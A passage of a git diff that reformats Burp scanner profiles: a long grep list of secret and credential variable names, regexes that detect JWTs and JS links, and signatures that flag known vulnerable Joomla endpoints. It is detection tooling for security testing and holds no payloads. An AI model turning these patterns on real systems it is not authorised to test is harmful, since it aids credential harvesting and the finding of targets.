"true,Or,parse[_-]js[_-]key", + "true,Or,passwordtravis", + "true,Or,paypal[_-]client[_-]secret", + "true,Or,percy[_-]project", + "true,Or,percy[_-]token", + "true,Or,personal[_-]key", + "true,Or,personal[_-]secret", + "true,Or,pg[_-]database", + "true,Or,pg[_-]host", + "true,Or,places[_-]api[_-]key", + "true,Or,places[_-]apikey", + "true,Or,plotly[_-]apikey", + "true,Or,plugin[_-]password", + "true,Or,postgres[_-]env[_-]postgres[_-]db", + "true,Or,postgres[_-]env[_-]postgres[_-]password", + "true,Or,postgresql[_-]db", + "true,Or,postgresql[_-]pass", + "true,Or,prebuild[_-]auth", + "true,Or,preferred[_-]username", + "true,Or,pring[_-]mail[_-]username", + "true,Or,private[_-]signing[_-]password", + "true,Or,prod[_-]access[_-]key[_-]id", + "true,Or,prod[_-]password", + "true,Or,prod[_-]secret[_-]key", + "true,Or,project[_-]config", + "true,Or,publish[_-]access", + "true,Or,publish[_-]key", + "true,Or,publish[_-]secret", + "true,Or,pushover[_-]token", + "true,Or,pypi[_-]passowrd", + "true,Or,qiita[_-]token", + "true,Or,quip[_-]token", + "true,Or,rabbitmq[_-]password", + "true,Or,randrmusicapiaccesstoken", + "true,Or,redis[_-]stunnel[_-]urls", + "true,Or,rediscloud[_-]url", + "true,Or,refresh[_-]token", + "true,Or,registry[_-]pass", + "true,Or,registry[_-]secure", + "true,Or,release[_-]gh[_-]token", + "true,Or,release[_-]token", + "true,Or,reporting[_-]webdav[_-]pwd", + "true,Or,reporting[_-]webdav[_-]url", + "true,Or,repotoken", + "true,Or,rest[_-]api[_-]key", + "true,Or,rinkeby[_-]private[_-]key", + "true,Or,ropsten[_-]private[_-]key", + "true,Or,route53[_-]access[_-]key[_-]id", + "true,Or,rtd[_-]key[_-]pass", + "true,Or,rtd[_-]store[_-]pass", + "true,Or,rubygems[_-]auth[_-]token", + "true,Or,s3[_-]access[_-]key", + "true,Or,s3[_-]access[_-]key[_-]id", + "true,Or,s3[_-]bucket[_-]name[_-]app[_-]logs", + "true,Or,s3[_-]bucket[_-]name[_-]assets", + "true,Or,s3[_-]external[_-]3[_-]amazonaws[_-]com", + "true,Or,s3[_-]key", + "true,Or,s3[_-]key[_-]app[_-]logs", + "true,Or,s3[_-]key[_-]assets", + "true,Or,s3[_-]secret[_-]app[_-]logs", + "true,Or,s3[_-]secret[_-]assets", + "true,Or,s3[_-]secret[_-]key", + "true,Or,s3[_-]user[_-]secret", + "true,Or,sacloud[_-]access[_-]token", + "true,Or,sacloud[_-]access[_-]token[_-]secret", + "true,Or,sacloud[_-]api", + "true,Or,salesforce[_-]bulk[_-]test[_-]password", + "true,Or,salesforce[_-]bulk[_-]test[_-]security[_-]token", + "true,Or,sandbox[_-]access[_-]token", + "true,Or,sandbox[_-]aws[_-]access[_-]key[_-]id", + "true,Or,sandbox[_-]aws[_-]secret[_-]access[_-]key", + "true,Or,sauce[_-]access[_-]key", + "true,Or,scrutinizer[_-]token", + "true,Or,sdr[_-]token", + "true,Or,secret[_-]0", + "true,Or,secret[_-]1", + "true,Or,secret[_-]10", + "true,Or,secret[_-]11", + "true,Or,secret[_-]2", + "true,Or,secret[_-]3", + "true,Or,secret[_-]4", + "true,Or,secret[_-]5", + "true,Or,secret[_-]6", + "true,Or,secret[_-]7", + "true,Or,secret[_-]8", + "true,Or,secret[_-]9", + "true,Or,secret[_-]key[_-]base", + "true,Or,segment[_-]api[_-]key", + "true,Or,selion[_-]log[_-]level[_-]dev", + "true,Or,selion[_-]selenium[_-]host", + "true,Or,sendgrid[_-]api[_-]key", + "true,Or,sendgrid[_-]key", + "true,Or,sendgrid[_-]password", + "true,Or,sendgrid[_-]user", + "true,Or,sendgrid[_-]username", + "true,Or,sendwithus[_-]key", + "true,Or,sentry[_-]auth[_-]token", + "true,Or,sentry[_-]default[_-]org", + "true,Or,sentry[_-]endpoint", + "true,Or,sentry[_-]key", + "true,Or,service[_-]account[_-]secret", + "true,Or,ses[_-]access[_-]key", + "true,Or,ses[_-]secret[_-]key", + "true,Or,signing[_-]key", + "true,Or,signing[_-]key[_-]password", + "true,Or,signing[_-]key[_-]secret", + "true,Or,signing[_-]key[_-]sid", + "true,Or,slash[_-]developer[_-]space", + "true,Or,slash[_-]developer[_-]space[_-]key", + "true,Or,slate[_-]user[_-]email", + "true,Or,snoowrap[_-]client[_-]secret", + "true,Or,snoowrap[_-]password", + "true,Or,snoowrap[_-]refresh[_-]token", + "true,Or,snyk[_-]api[_-]token", + "true,Or,snyk[_-]token", + "true,Or,socrata[_-]app[_-]token", + "true,Or,socrata[_-]password", + "true,Or,sonar[_-]organization[_-]key", + "true,Or,sonar[_-]project[_-]key", + "true,Or,sonar[_-]token", + "true,Or,sonatype[_-]gpg[_-]key[_-]name", + "true,Or,sonatype[_-]gpg[_-]passphrase", + "true,Or,sonatype[_-]nexus[_-]password", + "true,Or,sonatype[_-]pass", + "true,Or,sonatype[_-]password", + "true,Or,sonatype[_-]token[_-]password", + "true,Or,sonatype[_-]token[_-]user", + "true,Or,sonatypepassword", + "true,Or,soundcloud[_-]client[_-]secret", + "true,Or,soundcloud[_-]password", + "true,Or,spaces[_-]access[_-]key[_-]id", + "true,Or,spaces[_-]secret[_-]access[_-]key", + "true,Or,spotify[_-]api[_-]access[_-]token", + "true,Or,spotify[_-]api[_-]client[_-]secret", + "true,Or,spring[_-]mail[_-]password", + "true,Or,sqsaccesskey", + "true,Or,sqssecretkey", + "true,Or,square[_-]reader[_-]sdk[_-]repository[_-]password", + "true,Or,srcclr[_-]api[_-]token", + "true,Or,ssmtp[_-]config", + "true,Or,staging[_-]base[_-]url[_-]runscope", + "true,Or,star[_-]test[_-]aws[_-]access[_-]key[_-]id", + "true,Or,star[_-]test[_-]bucket", + "true,Or,star[_-]test[_-]location", + "true,Or,star[_-]test[_-]secret[_-]access[_-]key", + "true,Or,starship[_-]account[_-]sid", + "true,Or,starship[_-]auth[_-]token", + "true,Or,stormpath[_-]api[_-]key[_-]id", + "true,Or,stormpath[_-]api[_-]key[_-]secret", + "true,Or,strip[_-]publishable[_-]key", + "true,Or,strip[_-]secret[_-]key", + "true,Or,stripe[_-]private", + "true,Or,stripe[_-]public", + "true,Or,surge[_-]login", + "true,Or,surge[_-]token", + "true,Or,svn[_-]pass", + "true,Or,tesco[_-]api[_-]key", + "true,Or,test[_-]github[_-]token", + "true,Or,test[_-]test", + "true,Or,tester[_-]keys[_-]password", + "true,Or,thera[_-]oss[_-]access[_-]key", + "true,Or,token[_-]core[_-]java", + "true,Or,travis[_-]access[_-]token", + "true,Or,travis[_-]api[_-]token", + "true,Or,travis[_-]branch", + "true,Or,travis[_-]com[_-]token", + "true,Or,travis[_-]e2e[_-]token", + "true,Or,travis[_-]gh[_-]token", + "true,Or,travis[_-]pull[_-]request", + "true,Or,travis[_-]secure[_-]env[_-]vars", + "true,Or,travis[_-]token", + "true,Or,trex[_-]client[_-]token", + "true,Or,trex[_-]okta[_-]client[_-]token", + "true,Or,twilio[_-]api[_-]key", + "true,Or,twilio[_-]api[_-]secret", + "true,Or,twilio[_-]chat[_-]account[_-]api[_-]service", + "true,Or,twilio[_-]configuration[_-]sid", + "true,Or,twilio[_-]sid", + "true,Or,twilio[_-]token", + "true,Or,twine[_-]password", + "true,Or,twitter[_-]consumer[_-]key", + "true,Or,twitter[_-]consumer[_-]secret", + "true,Or,twitteroauthaccesssecret", + "true,Or,twitteroauthaccesstoken", + "true,Or,unity[_-]password", + "true,Or,unity[_-]serial", + "true,Or,urban[_-]key", + "true,Or,urban[_-]master[_-]secret", + "true,Or,urban[_-]secret", + "true,Or,us[_-]east[_-]1[_-]elb[_-]amazonaws[_-]com", + "true,Or,use[_-]ssh", + "true,Or,user[_-]assets[_-]access[_-]key[_-]id", + "true,Or,user[_-]assets[_-]secret[_-]access[_-]key", + "true,Or,v[_-]sfdc[_-]client[_-]secret", + "true,Or,v[_-]sfdc[_-]password", + "true,Or,vip[_-]github[_-]build[_-]repo[_-]deploy[_-]key", + "true,Or,vip[_-]github[_-]deploy[_-]key", + "true,Or,vip[_-]github[_-]deploy[_-]key[_-]pass", + "true,Or,virustotal[_-]apikey", + "true,Or,visual[_-]recognition[_-]api[_-]key", + "true,Or,wakatime[_-]api[_-]key", + "true,Or,watson[_-]conversation[_-]password", + "true,Or,watson[_-]device[_-]password", + "true,Or,watson[_-]password", + "true,Or,widget[_-]basic[_-]password", + "true,Or,widget[_-]basic[_-]password[_-]2", + "true,Or,widget[_-]basic[_-]password[_-]3", + "true,Or,widget[_-]basic[_-]password[_-]4", + "true,Or,widget[_-]basic[_-]password[_-]5", + "true,Or,widget[_-]fb[_-]password", + "true,Or,widget[_-]fb[_-]password[_-]2", + "true,Or,widget[_-]fb[_-]password[_-]3", + "true,Or,widget[_-]test[_-]server", + "true,Or,wincert[_-]password", + "true,Or,wordpress[_-]db[_-]password", + "true,Or,wordpress[_-]db[_-]user", + "true,Or,wpjm[_-]phpunit[_-]google[_-]geocode[_-]api[_-]key", + "true,Or,wporg[_-]password", + "true,Or,wpt[_-]db[_-]password", + "true,Or,wpt[_-]db[_-]user", + "true,Or,wpt[_-]prepare[_-]dir", + "true,Or,wpt[_-]report[_-]api[_-]key", + "true,Or,wpt[_-]ssh[_-]connect", + "true,Or,wpt[_-]ssh[_-]private[_-]key[_-]base64", + "true,Or,www[_-]googleapis[_-]com", + "true,Or,yangshun[_-]gh[_-]password", + "true,Or,yangshun[_-]gh[_-]token", + "true,Or,yt[_-]account[_-]client[_-]secret", + "true,Or,yt[_-]account[_-]refresh[_-]token", + "true,Or,yt[_-]api[_-]key", + "true,Or,yt[_-]client[_-]secret", + "true,Or,yt[_-]partner[_-]client[_-]secret", + "true,Or,yt[_-]partner[_-]refresh[_-]token", + "true,Or,yt[_-]server[_-]api[_-]key", + "true,Or,zendesk[_-]travis[_-]github", + "true,Or,zensonatypepassword", + "true,Or,zhuliang[_-]gh[_-]token", + "true,Or,zopim[_-]account[_-]key" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Interesting Keywords", + "IssueSeverity": "Information", + "IssueConfidence": "Tentative", + "IssueDetail": "Interesting Keywords detected. Needs manual revision, it could means nothing", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/JS_LinkFinder.bb b/profiles/JS_LinkFinder.bb old mode 100644 new mode 100755 index aed0f95..873aefd --- a/profiles/JS_LinkFinder.bb +++ b/profiles/JS_LinkFinder.bb @@ -1 +1,59 @@ -[{"Name":"JS_LinkFinder","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?:\"|\u0027)(((?:[a-zA-Z]{1,10}://|//)[^\"\u0027/]{1,}\\.[a-zA-Z]{2,}[^\"\u0027]{0,})|((?:/|\\.\\./|\\./)[^\"\u0027\u003e\u003c,;| *()(%%$^/\\\\\\[\\]][^\"\u0027\u003e\u003c,;|()]{1,})|([a-zA-Z0-9_\\-/]{1,}/[a-zA-Z0-9_\\-/]{1,}\\.(?:[a-zA-Z]{1,4}|action)(?:[\\?|/][^\"|\u0027]{0,}|))|([a-zA-Z0-9_\\-]{1,}\\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\\?[^\"|^\u0027]{0,}|)))(?:\"|\u0027)"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"application/javascript","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"JS LinkFinder","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "JS_LinkFinder", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(?:\"|\u0027)(((?:[a-zA-Z]{1,10}://|//)[^\"\u0027/]{1,}\\.[a-zA-Z]{2,}[^\"\u0027]{0,})|((?:/|\\.\\./|\\./)[^\"\u0027\u003e\u003c,;| *()(%%$^/\\\\\\[\\]][^\"\u0027\u003e\u003c,;|()]{1,})|([a-zA-Z0-9_\\-/]{1,}/[a-zA-Z0-9_\\-/]{1,}\\.(?:[a-zA-Z]{1,4}|action)(?:[\\?|/][^\"|\u0027]{0,}|))|([a-zA-Z0-9_\\-]{1,}\\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\\?[^\"|^\u0027]{0,}|)))(?:\"|\u0027)" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "application/javascript", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "JS LinkFinder", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/JWT-Request.bb b/profiles/JWT-Request.bb index 369e8a4..c617fd8 100755 --- a/profiles/JWT-Request.bb +++ b/profiles/JWT-Request.bb @@ -1 +1,60 @@ -[{"Name":"JWT-Request","Enabled":true,"Scanner":3,"Author":"@Sy3Omda","UrlEncode":false,"Grep":["true,Or,All Request,Name,[\u003d ]eyJ[A-Za-z0-9_\\/+-]*\\.[A-Za-z0-9._\\/+-]*"],"Tags":["JWT","All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":true,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"NegativeCT":false,"IsResponseCode":false,"NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"JWT-Detected","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"JWT Detected: \u003cbr\u003e\u003cgrep\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "JWT-Request", + "Name": "", + "Enabled": true, + "Scanner": 3, + "Author": "@Sy3Omda", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,All Request,Name,[\u003d ]eyJ[A-Za-z0-9_\\/+-]*\\.[A-Za-z0-9._\\/+-]*" + ], + "Tags": [ + "JWT", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": true, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "JWT-Detected", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "JWT Detected: \u003cbr\u003e\u003cgrep\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/JWT.bb b/profiles/JWT.bb old mode 100644 new mode 100755 index 0517b12..c910f70 --- a/profiles/JWT.bb +++ b/profiles/JWT.bb @@ -1 +1,60 @@ -[{"Name":"JWT","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,^(ey[A-Za-z0-9_-]*\\.[A-Za-z0-9._-]*|ey[A-Za-z0-9_\\/+-]*\\.[A-Za-z0-9._\\/+-]*)","true,Or,[^a-zA-Z0-9](ey[A-Za-z0-9_-]*\\.[A-Za-z0-9._-]*|ey[A-Za-z0-9_\\/+-]*\\.[A-Za-z0-9._\\/+-]*)"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"JWT","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "JWT", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,^(ey[A-Za-z0-9_-]*\\.[A-Za-z0-9._-]*|ey[A-Za-z0-9_\\/+-]*\\.[A-Za-z0-9._\\/+-]*)", + "true,Or,[^a-zA-Z0-9](ey[A-Za-z0-9_-]*\\.[A-Za-z0-9._-]*|ey[A-Za-z0-9_\\/+-]*\\.[A-Za-z0-9._\\/+-]*)" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "JWT", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Joomla-ArbitraryFileUpload.bb b/profiles/Joomla-ArbitraryFileUpload.bb old mode 100644 new mode 100755 index 73b395e..3508acd --- a/profiles/Joomla-ArbitraryFileUpload.bb +++ b/profiles/Joomla-ArbitraryFileUpload.bb @@ -1 +1,60 @@ -[{"Name":"Joomla-ArbitraryFileUpload","Enabled":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["index.php?option\u003dcom_joomanager"],"Tags":["CMS"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Joomla-ArbitraryFileUpload","IssueSeverity":"High","IssueConfidence":"Firm","IssueDetail":"Joomla Arbitrary File Upload:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4687/","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Joomla-ArbitraryFileUpload", + "Name": "", + "Enabled": true, + "Scanner": 3, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,All Request,Value,index.php?option\u003dcom_joomanager" + ], + "Tags": [ + "CMS", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Joomla-ArbitraryFileUpload", + "IssueSeverity": "High", + "IssueConfidence": "Firm", + "IssueDetail": "Joomla Arbitrary File Upload:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4687/", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Joomla-CVE-2015-7297.bb b/profiles/Joomla-CVE-2015-7297.bb new file mode 100755 index 0000000..ba47490 --- /dev/null +++ b/profiles/Joomla-CVE-2015-7297.bb @@ -0,0 +1,61 @@ +[ + { + "ProfileName": "Joomla-CVE-2015-7297", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,powered by joomla 3.2", + "true,Or,powered by joomla 3.3", + "true,Or,powered by joomla 3.4" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Joomla-SQLi", + "IssueSeverity": "High", + "IssueConfidence": "Firm", + "IssueDetail": "Joomla SQLi - CVE-2015-7297: \u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4110/", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Joomla-ReflectedXSS.bb b/profiles/Joomla-ReflectedXSS.bb old mode 100644 new mode 100755 index 4f2853f..6de94c2 --- a/profiles/Joomla-ReflectedXSS.bb +++ b/profiles/Joomla-ReflectedXSS.bb @@ -1 +1,61 @@ -[{"Name":"Joomla-ReflectedXSS","Enabled":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["sendmessage.php?type\u003dskype"],"Tags":["XSS","CMS"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Joomla-ReflectedXSS","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Joomla-ReflectedXSS:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4398/","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Joomla-ReflectedXSS", + "Name": "", + "Enabled": true, + "Scanner": 3, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,All Request,Value,sendmessage.php?type\u003dskype" + ], + "Tags": [ + "XSS", + "CMS", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Joomla-ReflectedXSS", + "IssueSeverity": "Medium", + "IssueConfidence": "Certain", + "IssueDetail": "Joomla-ReflectedXSS:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4398/", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/JoomlaSQLi-com_artforms.bb b/profiles/JoomlaSQLi-com_artforms.bb old mode 100644 new mode 100755 index 2aacf2f..4828739 --- a/profiles/JoomlaSQLi-com_artforms.bb +++ b/profiles/JoomlaSQLi-com_artforms.bb @@ -1 +1,59 @@ -[{"Name":"JoomlaSQLi-com_artforms","Enabled":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["index.php?option\u003dcom_artforms"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"JoomlaSQLi","IssueSeverity":"High","IssueConfidence":"Firm","IssueDetail":"Joomla \"com_artforms\" component SQL Injection:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4386/","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "JoomlaSQLi-com_artforms", + "Name": "", + "Enabled": true, + "Scanner": 3, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,All Request,Value,index.php?option\u003dcom_artforms" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "JoomlaSQLi", + "IssueSeverity": "High", + "IssueConfidence": "Firm", + "IssueDetail": "Joomla 